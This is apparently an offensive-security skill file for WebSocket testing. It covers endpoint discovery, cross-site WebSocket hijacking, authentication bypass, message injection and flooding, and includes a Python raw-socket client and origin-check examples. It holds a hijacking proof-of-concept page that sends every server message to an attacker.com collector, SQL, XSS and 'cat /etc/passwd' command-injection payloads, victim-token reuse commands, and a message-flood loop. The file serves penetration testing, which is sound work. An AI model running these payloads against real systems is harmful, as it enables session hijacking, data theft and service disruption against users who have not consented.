attack-websocket
WebSocket security testing — CSWSH, message injection, auth bypass, origin validation
| Field | Value |
|---|---|
| name | attack-websocket |
| description | WebSocket security testing — CSWSH, message injection, auth bypass, origin validation |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["websocket","web","cswsh","injection","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-1385","CWE-346"] |
| chains_with | ["attack-cors"] |
| prerequisites | [] |
| severity_boost | {"attack-cors":"WebSocket + CORS bypass = cross-origin data theft via WS"} |
Exploit WebSocket implementation flaws including cross-site WebSocket hijacking (CSWSH), message injection, and authentication bypass.
Find WebSocket endpoints. A 101 means the path accepted the upgrade; a 400 or 426 usually means the path is WebSocket-aware but rejected the handshake; a 200 with HTML means it is an ordinary page.

```bash
# Look for a WebSocket upgrade on the root. --http1.1 is required: curl negotiates
# HTTP/2 for https by default and the Upgrade header is not valid there.
curl -s -D- -o /dev/null --http1.1 --max-time 5 https://TARGET/ \
  -H "Upgrade: websocket" \
  -H "Connection: Upgrade" \
  -H "Sec-WebSocket-Version: 13" \
  -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ=="
# Check common paths, printing the path and the status line
for path in /ws /socket /websocket /api/ws /chat /live /realtime; do
  printf '%s ' "$path"
  curl -s -D- -o /dev/null --http1.1 --max-time 5 "https://TARGET$path" \
    -H "Upgrade: websocket" \
    -H "Connection: Upgrade" \
    -H "Sec-WebSocket-Version: 13" \
    -H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" 2>/dev/null | head -1
done
```
Check whether the Origin header is validated. The server accepting a foreign Origin is only half of CSWSH: for the attack to steal data, the victim's browser must also attach the session cookie to the cross-site handshake, which requires the cookie to be SameSite=None (Chromium treats cookies without a SameSite attribute as Lax, and Lax cookies are not sent on a cross-site WebSocket handshake). Test both conditions:

```bash
# Connect with an evil origin
websocat -H "Origin: https://evil.com" "wss://TARGET/ws"
# Repeat with a valid session cookie and the evil origin, then send an authenticated action
websocat -H "Origin: https://evil.com" -H "Cookie: session=VALID_TOKEN" "wss://TARGET/ws" \
  <<< '{"action":"get_profile"}'
# If the handshake succeeds (101) and the authenticated response comes back → CSWSH is possible,
# provided the session cookie is SameSite=None
```
PoC HTML (hosted on the attacker's origin; the browser sets the Origin header itself, the page cannot override it):

```html
<script>
// The victim's browser attaches the session cookie to the handshake if the cookie
// permits cross-site sends (SameSite=None); the server sees Origin: <attacker page>.
var ws = new WebSocket('wss://TARGET/ws');
ws.onmessage = function(e) {
  // exfiltrate every server message to the attacker's collector
  fetch('https://attacker.com/log?data=' + encodeURIComponent(btoa(e.data)));
};
ws.onopen = function() {
  ws.send(JSON.stringify({action: 'get_profile'}));
};
</script>
```
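A worked check of the Origin validation logic itself, as an added example rather than code from the original skill: a weak substring check of the kind that produces CSWSH findings, beside a strict allowlist check, both run over the origins an attacker can actually present. The target hostnames and the probe set are assumptions.

```python
# Added example, not part of the original skill: weak vs strict server-side
# Origin checks run against attacker-presentable origins. Hostnames are assumed.
from urllib.parse import urlsplit

ALLOWED_ORIGINS = {"https://target.example", "https://app.target.example"}  # assumed

PROBE_ORIGINS = [  # constructed probe set
    "https://target.example",               # legitimate
    "https://app.target.example",           # legitimate
    "https://target.example.evil.example",  # allowed host is a prefix of the attacker host
    "https://eviltarget.example",           # allowed host is a suffix of the attacker host
    "https://target.example@evil.example",  # userinfo trick: the real host is evil.example
    "http://target.example",                # scheme downgrade
    "https://target.example:8443",          # port mismatch
    "null",                                 # sandboxed iframe / file:// page
    None,                                   # no Origin header (non-browser client)
]


def weak_origin_check(origin):
    """Common broken check: substring match on the expected hostname."""
    return "target.example" in (origin or "")


def strict_origin_check(origin):
    """Exact match of scheme://host[:port] against an allowlist.
    Missing, 'null' or malformed origins are rejected outright."""
    if not origin or origin == "null":
        return False
    parts = urlsplit(origin)
    if parts.path not in ("", "/") or parts.query or parts.fragment:
        return False
    normalized = f"{parts.scheme.lower()}://{parts.netloc.lower()}"
    return normalized in ALLOWED_ORIGINS


def run_probes(check):
    """Map each probe origin to the check's verdict."""
    return {origin: check(origin) for origin in PROBE_ORIGINS}


def cswsh_bypasses(check):
    """Origins the check accepts that are not in the allowlist: each one is a
    cross-site origin from which a CSWSH page would be served a handshake."""
    return [o for o, ok in run_probes(check).items() if ok and o not in ALLOWED_ORIGINS]


if __name__ == "__main__":
    print("weak check accepts:", cswsh_bypasses(weak_origin_check))
    print("strict check accepts:", cswsh_bypasses(strict_origin_check))
```

The strict check compares the whole origin string after normalizing case, so a different scheme, a different port and any host that merely contains the expected name are all rejected; a missing Origin is rejected too, because a browser always sends one on a WebSocket handshake and the absence only indicates a non-browser client, which the cookie-based session should not be trusting anyway.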
Check authentication on the handshake and the session lifecycle. Connecting is not enough on its own; send an action that requires a session and see whether it is served:

```bash
# Connect without an auth token
websocat "wss://TARGET/ws" <<< '{"action":"get_profile"}'
# Test token reuse after logout
websocat -H "Cookie: session=EXPIRED_TOKEN" "wss://TARGET/ws" <<< '{"action":"get_profile"}'
# Connect with another user's token
websocat -H "Cookie: session=VICTIM_TOKEN" "wss://TARGET/ws" <<< '{"action":"get_profile"}'
```
Message injection. websocat sends each line read from stdin as one text message, so the here-strings below each deliver a single JSON message (the `<<<` form is bash syntax):

```bash
# Test for SQL injection via WebSocket message
websocat "wss://TARGET/ws" <<< '{"action":"search","query":"test\" OR 1=1--"}'
# XSS via WebSocket message (if rendered in other clients)
websocat "wss://TARGET/ws" <<< '{"action":"chat","message":"<img src=x onerror=alert(1)>"}'
# Command injection
websocat "wss://TARGET/ws" <<< '{"action":"exec","cmd":"id; cat /etc/passwd"}'
```
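The authentication tests and the injection tests above both depend on knowing that the upgrade really happened and then getting an arbitrary payload onto the socket. The following is an added example, not the original skill's code: a minimal raw WebSocket client that sets any handshake header you choose (Origin, Cookie, Authorization), accepts the upgrade only when the server returns 101 with the correct Sec-WebSocket-Accept for the key it was sent, and then sends one properly masked text frame. The host, path and cookie values in the usage line are assumptions; the handshake and frame test vectors are the ones from RFC 6455.

```python
# Added example, not the original skill's code: raw WebSocket handshake with
# caller-controlled headers, upgrade verification, and a masked text frame.
import base64
import hashlib
import os
import socket
import ssl

WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"  # fixed by RFC 6455


def expected_accept(key):
    """Sec-WebSocket-Accept the server must return for a given client key."""
    digest = hashlib.sha1((key + WS_GUID).encode()).digest()
    return base64.b64encode(digest).decode()


def build_handshake(host, path, key, extra_headers):
    """HTTP/1.1 upgrade request; extra_headers injects Origin/Cookie/etc."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        "Upgrade: websocket",
        "Connection: Upgrade",
        f"Sec-WebSocket-Key: {key}",
        "Sec-WebSocket-Version: 13",
    ] + [f"{name}: {value}" for name, value in extra_headers.items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def parse_handshake_response(raw, key):
    """Return (status, upgraded). upgraded is True only for a 101 whose
    Sec-WebSocket-Accept matches the key; a 200 HTML page, a 403/426, or a 101
    with a bogus Accept all count as no upgrade."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode(errors="replace")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    upgraded = status == 101 and headers.get("sec-websocket-accept") == expected_accept(key)
    return status, upgraded


def frame_text(payload, mask=None):
    """Client-to-server text frame. Clients MUST mask (RFC 6455 5.3); a fixed
    mask is accepted only so the output is reproducible in tests."""
    mask = mask or os.urandom(4)
    header = bytearray([0x81])  # FIN=1, opcode=1 (text)
    n = len(payload)
    if n < 126:
        header.append(0x80 | n)
    elif n < 65536:
        header += bytes([0x80 | 126]) + n.to_bytes(2, "big")
    else:
        header += bytes([0x80 | 127]) + n.to_bytes(8, "big")
    masked = bytes(b ^ mask[i % 4] for i, b in enumerate(payload))
    return bytes(header) + mask + masked


def probe(host, path, extra_headers, payload=None, timeout=5):
    """Live use: TLS connect, handshake with the given headers, optionally send
    one text frame and return (status, upgraded, raw reply bytes)."""
    key = base64.b64encode(os.urandom(16)).decode()
    ctx = ssl.create_default_context()
    with socket.create_connection((host, 443), timeout=timeout) as tcp:
        with ctx.wrap_socket(tcp, server_hostname=host) as tls:
            tls.sendall(build_handshake(host, path, key, extra_headers))
            raw = b""
            while b"\r\n\r\n" not in raw:
                chunk = tls.recv(4096)
                if not chunk:
                    break
                raw += chunk
            status, upgraded = parse_handshake_response(raw, key)
            reply = b""
            if upgraded and payload is not None:
                tls.sendall(frame_text(payload))
                reply = tls.recv(65536)  # raw server frame(s), not decoded here
            return status, upgraded, reply


if __name__ == "__main__":
    # CSWSH check: foreign Origin plus a valid session cookie (assumed values)
    print(probe("TARGET", "/ws",
                {"Origin": "https://evil.com", "Cookie": "session=VALID_TOKEN"},
                b'{"action":"get_profile"}'))
```

Swap the headers dictionary for the expired or victim cookie to run the session tests, and put any of the injection payloads above in `payload`; checking the Accept value matters because some reverse proxies answer a WebSocket upgrade with a 101 while the application behind them never completed the handshake, and a bare websocat connection will not tell you which case you are looking at.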
Resource exhaustion (rate limiting and message size limits):

```bash
# Rapid message sending
for i in $(seq 1 1000); do
  echo '{"action":"ping"}'
done | websocat "wss://TARGET/ws"
# Large message; -B raises websocat's own maximum message size (default 65536 bytes)
# so the 1 MB line is delivered as one frame rather than being cut down
python3 -c "print('{\"data\":\"' + 'A'*1000000 + '\"}')" | websocat -B 2000000 "wss://TARGET/ws"
```
| Finding | Severity |
|---|---|
| CSWSH — cross-site WebSocket hijacking | High (P2) |
| No authentication on WebSocket | High (P2) |
| SQL/command injection via WS message | Critical (P1) |
| Stored XSS via WS message | High (P2) |
| Session not invalidated after logout | Medium (P3) |
Tools:
- websocat (external) — WebSocket CLI client